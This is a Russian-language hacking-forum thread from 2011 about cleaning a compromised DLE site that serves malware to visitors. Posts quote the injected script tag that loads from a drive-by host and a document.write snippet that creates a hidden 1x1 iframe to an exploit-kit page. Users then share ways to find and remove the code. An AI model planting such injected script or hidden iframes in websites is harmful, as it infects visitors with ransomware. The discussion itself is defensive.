Вирус попал на сайт (DLE)

Discussion in 'Болталка' started by NeXArmAor, 14 Jun 2011.

  1. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Вообщем такая беда. Попал вирус на двиг DLE(непонятно как), судя по всему кто-то сплойтанул и залил скрипт. Видна строчка скрипта - <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://gotraf.net/in.php?id=123"></script>
    Но показывается она только гостям, после этого на комп грузится и запускается прога террорист Winlocker. Ни в одном файле скрипт файле не виден. Искал в двиге, базе, все тщетно. Кто сталкивался, подскажите как удалить эту заразу с сайта?
    Яндекс перекрыл доступ к сайту.
    В каких файлаъ она сидит и какую форму вирус принимает?
     
    #1 NeXArmAor, 14 Jun 2011
    Last edited: 14 Jun 2011
  2. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    Дайте доступ в личку, удалю все вирусы.
     
  3. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Лучше скажи где может сидеть вирус. Удалить то и сам могу)
     
  4. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,190
    Likes Received:
    618
    Reputations:
    690
    вирус льется на стороне связки, а твои уники через скрытый ифрейм попадают туда и оттуда уже пробивается сплойтом и загружается файл.
     
    _________________________
  5. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    shell_c0de, Спс за подробный ответ. Можно узнать как найти этот скрытый инфрейм и удалить?
    У меня DLE 8.5 NULLED, везде искал. Не могу никаки найти код.
     
  6. ride

    ride New Member

    Joined:
    18 Apr 2010
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    у меня была такая же штука, "вирус" (строка на вредоносный javascript) был почти в каждом файле движка. В итоге я скачал все файла на компьютер, при помощи программы (название не помню) нашел строчку в файлах и заменил ее ничем (программа сделала все сама во всех файлах :D). Правда, потом оказалось, что кое-где были экранированные слеши ну и в итоге остатки пришлось дочищать вручную)
     
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,190
    Likes Received:
    618
    Reputations:
    690
    сам не пробовал просто пройтись по ссылке http://gotraf.net/in.php?id=123 ? )
    связка
    PHP:
    document.write('<iframe src 
    ="http://xyzqwe.cz.cc/forum.php" width="1" height="1" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'
    );
     
    _________________________
  8. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    ride, По какой строчке искал?
     
  9. ride

    ride New Member

    Joined:
    18 Apr 2010
    Messages:
    26
    Likes Received:
    4
    Reputations:
    0
    NeXArmAor, у меня в файлах была <script src....></script> по ней и искал.
     
  10. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    shell_c0de, ну чё ты тупишь!
    он спрашивает где ему на серваре своём искать ифрем, он его на сайте видит а в .php нафлах найти не может
    вот и спрашивает где его искать

    ябы сделал так:
    возьми бекап, напиши чекер файлов по md5 чек сумме и пусть сравнивает файлы оригинала с твоими - выловишь изменённые файлы, там и код словишь
    если нет бекапа (что врядле, у тебя же на компе должен быть... не?) то скачай эту же версию, и сравнивай
    это если не переписывал, если переписывал - заменяй файлы по очереди пока код не пропадёт (ну не совсем по 1, папками заменяй, там выяснишь)
     
    #10 Ponchik, 14 Jun 2011
    Last edited: 14 Jun 2011
  11. Gigabajt_

    Gigabajt_ Member

    Joined:
    13 Feb 2010
    Messages:
    80
    Likes Received:
    5
    Reputations:
    0
    а что если тупо обновить файлы движка ?
     
  12. Alex24

    Alex24 Member

    Joined:
    5 Sep 2010
    Messages:
    385
    Likes Received:
    56
    Reputations:
    19
    Могу и ошибаться,поскольку DLE не юзал....Возможно ли просмотреть ИСТОРИЮ добавления файлов на сайт?...Последние добавления и будет вредоносом...
    Сильно не пинать...мысли вслух...
     
  13. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,190
    Likes Received:
    618
    Reputations:
    690
    господин Ponchik вы КЭП ? ) а я что посоветовал ? ) он искал сам винлокер а я объяснил что файла на самом серваке нету и через ифрейм (и что там код он сам знает читай первый пост) заливается файл а ему надо просто свои скрипты почистить от злокода и все ...
     
    _________________________
  14. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Скачал все файлы по FTP, двиг, шаблоны. Прогнал по возможным сигнам, base64_decode(точнее функции base64 находит в файлах, но где находится тело кода все равно что иголку в стоге сена искать), и прочие хухры мухры. Нифига не нашло. Где же прячется эта гадость ?

    shell_c0de, Я скачал все файлы сайта. По какой строке можно найти данную хрень в файле? Она вроде как шифруется иногда. Чисто по gotref.net ничего не находит,.

    Gigabajt_, Да дело не в нем видимо.
     
    #14 NeXArmAor, 14 Jun 2011
    Last edited: 14 Jun 2011
  15. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Сделай дамп бд и в нем поищи.
     
    _________________________
  16. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    ООоо, кажется нашел. Сидит тварь в Language\Russian/website.lng. Сейча вычищу.
    Такая строка тут кароче.
    Расшифровал base64 самую длинную составляющую через http://www.base64.ru/, вышло вот это:

    <script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://gotraf.net/in.php?id=123"></script>
     
  17. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Всем спасибо за советы. Кажется нашел зацепку и в будущем буду знать как убить эту хрень))

    У кого приключится подобный сабж, скачивайте все файлы с сайта и чекайте их через Actual Search & Replace со строкой Array(base64.

    Тот файл который будет найден и будет зараженным.
     
  18. 6anzay

    6anzay Member

    Joined:
    30 Nov 2009
    Messages:
    138
    Likes Received:
    28
    Reputations:
    10
    Нет, ну вот удалишь ты все коды iframe, а толку? Один раз поимели, что им помешает еще раз зайти и все по новой расставить? Я думаю они даже не руками его вставляют...

    ps

    Нуленый DLE ваще зло.
     
  19. NeXArmAor

    NeXArmAor Banned

    Joined:
    21 Apr 2007
    Messages:
    226
    Likes Received:
    161
    Reputations:
    6
    Хотелось бы знать, как этот код проник в файлы, каким способом? Чтобы закрыть эту дыру раз и навсегда.
     
  20. Kuteke

    Kuteke Banned

    Joined:
    26 Jun 2010
    Messages:
    179
    Likes Received:
    26
    Reputations:
    6
    WinMerge в руки!
     
Loading...
Similar Threads - Вирус попал сайт
  1. charlie_miller
    Replies:
    4
    Views:
    2,111